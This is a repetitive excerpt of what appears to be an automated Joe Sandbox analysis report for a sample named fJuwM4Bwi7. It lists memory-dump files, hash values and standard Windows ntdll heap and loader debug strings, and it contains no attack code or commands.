                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                        • API String ID: 0-2586055223
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                        • API String ID: 0-1391187441
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                        • API String ID: 0-1168191160
                                        Strings
                                        • HEAP: , xrefs: 329114B6
                                        • HEAP[%wZ]: , xrefs: 32911632
                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32911648
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                        • API String ID: 0-3178619729
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 32980128
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 329800C7
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 329800F1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                        • API String ID: 0-1145731471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: FilterFullPath$UseFilter$\??\
                                        • API String ID: 0-2779062949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                        • API String ID: 0-318774311
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                        • API String ID: 0-373624363
                                        Strings
                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 329EB3AA
                                        • GlobalizationUserSettings, xrefs: 329EB3B4
                                        • TargetNtPath, xrefs: 329EB3AF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                        • API String ID: 0-505981995
                                        Strings
                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3296E455
                                        • HEAP: , xrefs: 3296E442
                                        • HEAP[%wZ]: , xrefs: 3296E435
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                        • API String ID: 0-1340214556
                                        Strings
                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 329BD7B2
                                        • HEAP: , xrefs: 329BD79F
                                        • HEAP[%wZ]: , xrefs: 329BD792
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                        • API String ID: 0-3815128232
                                        Strings
                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32981943
                                        • LdrpAllocateTls, xrefs: 3298194A
                                        • minkernel\ntdll\ldrtls.c, xrefs: 32981954
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                        • API String ID: 0-4274184382
                                        Strings
                                        • RtlCreateActivationContext, xrefs: 32982803
                                        • SXS: %s() passed the empty activation context data, xrefs: 32982808
                                        • Actx , xrefs: 329432CC
                                        Similarity
                                        • API ID:
                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                        • API String ID: 0-859632880
                                        Strings
                                        • GlobalFlag, xrefs: 3299B30F
                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3299B2B2
                                        • @, xrefs: 3299B2F0
                                        Similarity
                                        • API ID:
                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                        • API String ID: 0-4192008846
                                        Strings
                                        • BuildLabEx, xrefs: 3295122F
                                        • @, xrefs: 329511C5
                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3295119B
                                        Similarity
                                        • API ID:
                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 0-3051831665
                                        Strings
                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 329985DE
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                        • API String ID: 0-702105204
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: @$@
                                        • API String ID: 0-149943524
                                        APIs
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: Legacy$UEFI
                                        • API String ID: 0-634100481
                                        Strings
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$$
                                        • API String ID: 3446177414-233714265
                                        Strings
                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 3291A229
                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 3291A21B
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                        • API String ID: 0-2876891731
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                        • API String ID: 0-118005554
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: .Local\$@
                                        • API String ID: 0-380025441
                                        Strings
                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3298289F
                                        • RtlpInitializeAssemblyStorageMap, xrefs: 3298289A
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                        • API String ID: 0-2653619699
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: MUI
                                        • API String ID: 0-1339004836
                                        APIs
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        APIs
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: de204db0878cfbbfadf3bd61ea15f98759bb75e7933168e198e7b01b6da6ac51
                                        • Instruction ID: c485b58682e7b5e24a51c645fbfb97339637749971b4f1afd0eefbb8231e545d
                                        • Opcode Fuzzy Hash: de204db0878cfbbfadf3bd61ea15f98759bb75e7933168e198e7b01b6da6ac51
                                        • Instruction Fuzzy Hash: 4B31007264030C9FC311DF14C8A0A5A77A9EF45768F10826AED089F2A2CB71EE42CFD0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 65c957ed59b3c9cb7cca9124ab72d7adcff692ea9261b8e2127ed5b83337e8d5
                                        • Instruction ID: e6fa3a69b3b7bd8dce5e842872aa35eee2fe39b42dc60c2810beaa7afb102cfa
                                        • Opcode Fuzzy Hash: 65c957ed59b3c9cb7cca9124ab72d7adcff692ea9261b8e2127ed5b83337e8d5
                                        • Instruction Fuzzy Hash: C931AD39615A09FFE7568B25CA90B89BBA5FF88750F416155EC0187B51CB71F831CB80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 1f03048945adb1f35f4e68bc11d1ac333b497138c8b43fda74b62ddbf57d8e80
                                        • Instruction ID: 049dc60aab6b7cb74f503e7c98fd6a7a48ba8b893b428155d383e90dce0eac6a
                                        • Opcode Fuzzy Hash: 1f03048945adb1f35f4e68bc11d1ac333b497138c8b43fda74b62ddbf57d8e80
                                        • Instruction Fuzzy Hash: 983167B59057068FCB04DF19C54094ABBF9FF89758F8489AEE8889B201D630ED05CFD2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: d289826de171c2b63b3ce4b2d22425eddd71b32ff711467845262f283f1541cd
                                        • Instruction ID: 3f1d9fd75ac82a67d46fd90f6bf6567d068e631229ab1bad96140138a24dc027
                                        • Opcode Fuzzy Hash: d289826de171c2b63b3ce4b2d22425eddd71b32ff711467845262f283f1541cd
                                        • Instruction Fuzzy Hash: 9EF0FA32200708AFE3319B18CC04F9ABBEDEF88B00F04052CA94293091CAA0E90ACA60
                                        Strings
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • API ID:
                                        • String ID: #%u
                                        • API String ID: 0-232158463
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • API ID:
                                        • String ID: Flst
                                        • API String ID: 0-2374792617
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fae5f475ec14f95847e93ccef484a86403507cbd17dcca3c48498c4b7fed0441
                                        • Instruction ID: 16096d5e719b90f8f413dcb968bcedeae8eadd73e0b7a630800f019ea036bd59
                                        • Opcode Fuzzy Hash: fae5f475ec14f95847e93ccef484a86403507cbd17dcca3c48498c4b7fed0441
                                        • Instruction Fuzzy Hash: C2A1C074B017169FEB18CF65C981BAAB7B9FF48354F654029ED0997381EB74E806CB80
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd33eae23635417dfb8255fb3ce173a11fb1a57a298774c534aaa7dc90051656
                                        • Instruction ID: 284df4c524145769cc781bd01cc8612ab757d73678357d6a68b1c29d95c2e6b3
                                        • Opcode Fuzzy Hash: dd33eae23635417dfb8255fb3ce173a11fb1a57a298774c534aaa7dc90051656
                                        • Instruction Fuzzy Hash: 5BA1ECB2A04701EFD716CF28C980B1AB7E9FF48708F415928F58AAB651D774EC52CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ceaf7e0e874dc325d2ab1214b10aee15100dec840212199400e246e712de0e6
                                        • Instruction ID: fcc3374a2b11ae008609052745fc2c2f18fd7fe3047807920817f467f6f67aed
                                        • Opcode Fuzzy Hash: 2ceaf7e0e874dc325d2ab1214b10aee15100dec840212199400e246e712de0e6
                                        • Instruction Fuzzy Hash: 95914579E007198FE714CB68C580BAD77B9FF88B58F054069EC449B389DA34A941CBD1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb3a62ebc0723f34159c6b73f8a8f12497e7b7b16670614c0b02bc557c3181b7
                                        • Instruction ID: 36185ba22fd4f89b3ee04b3769737aaf618950a74038a3e6bb1f01ceb01330d9
                                        • Opcode Fuzzy Hash: cb3a62ebc0723f34159c6b73f8a8f12497e7b7b16670614c0b02bc557c3181b7
                                        • Instruction Fuzzy Hash: 3EB16E78A00319CFEB14CF1AD541798B7A8BF48358F50855ADC26AB295DB34E883CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 039283d5c24a0e1b6acbd97ad914738f16ecff6ca914f08d4bd0763e7c5de339
                                        • Instruction ID: bed13d6ce610da50ba913546ee1335e15bddcfdb3dca5c5260e9d319c8e19277
                                        • Opcode Fuzzy Hash: 039283d5c24a0e1b6acbd97ad914738f16ecff6ca914f08d4bd0763e7c5de339
                                        • Instruction Fuzzy Hash: D7A19B75608346CFD314CF29C880A5ABBE9FF88744F20496DE9859B351EB70E946CB92
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                        • Instruction ID: ba635738f7f4a9bf0b707a047ea6ecb51cce4345da735b32297ee07009bd62c3
                                        • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                        • Instruction Fuzzy Hash: 0171E175A8123A8BDB10CF55D4A0BAFB7F9EF44784F91411ADC00EB245EB34D941CBA2
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                        • Instruction ID: 39e741628b1452f0d524b58b21c04218d463dea7fcd9fe14f447566c53fc647b
                                        • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                        • Instruction Fuzzy Hash: 0E819075A0020A8FDF18CF99C890AAEB7F6FF84314F14C169D8159B385DB74EA12DB80
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bbb8a707c6b2ad36522586338478c65a5fce8a6376f1adf88976208ef89092c
                                        • Instruction ID: 492897b722ce7d627f593be6c0f33dd78cc82c618d8d170db7f27cf551ab4ea6
                                        • Opcode Fuzzy Hash: 4bbb8a707c6b2ad36522586338478c65a5fce8a6376f1adf88976208ef89092c
                                        • Instruction Fuzzy Hash: 31815B75A00709AFEB16CFA8D880BDEB7F9FF48354F144429E995A7210DB70AC45DBA0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a5c58d05755adb5e974672b004030bd866c6d8ae1a6f1dce937dff39cc0fbd2
                                        • Instruction ID: 8318552ea95a5d813c5646ecf54d999c25f60fe520e1617176d9370ce2f9204f
                                        • Opcode Fuzzy Hash: 9a5c58d05755adb5e974672b004030bd866c6d8ae1a6f1dce937dff39cc0fbd2
                                        • Instruction Fuzzy Hash: 9B61F4B4B402059BFB19EF64C880BBE77AEAF84758F50C159E811A72C5DF70D941E7A0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58e5cf6a48a2629d792f2c640b7867aeb10278659c387664f6493d9d0de70c07
                                        • Instruction ID: 4cf95428992e1fa71d64c3f0b25ef9f6a0a678fb93220202c849ca9b4e321087
                                        • Opcode Fuzzy Hash: 58e5cf6a48a2629d792f2c640b7867aeb10278659c387664f6493d9d0de70c07
                                        • Instruction Fuzzy Hash: F1516C74608306DFD314CF2AC480A2ABBE9FB88744F50496EE99997359DB70E845CB92
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6af9eeb3b6a1cb0257f680f3c34a6e6d387480429863c6d844a503c47a22f794
                                        • Instruction ID: 41c6a9e84ac1ba0fe156b02451dfb3431f29cae06e1277e659553665f8b4042d
                                        • Opcode Fuzzy Hash: 6af9eeb3b6a1cb0257f680f3c34a6e6d387480429863c6d844a503c47a22f794
                                        • Instruction Fuzzy Hash: B9411671641709EFD72A8F19C890B1A77A9FF44B68F21C46AF948DB291DB70D842CF80
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a6d1cfdd41f3ee9bd0ce716032befb1cf6757ba0a6122f15c49cedb53fd16f4
                                        • Instruction ID: 19990528fa4dde7e86af60ce92d02a1263046ee559c05ae9e776a658834779f0
                                        • Opcode Fuzzy Hash: 0a6d1cfdd41f3ee9bd0ce716032befb1cf6757ba0a6122f15c49cedb53fd16f4
                                        • Instruction Fuzzy Hash: 0F5114B56013159FE321DF64CC80FAB77A8FB44764F140A2DFA1197292DB74E846CBA2
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
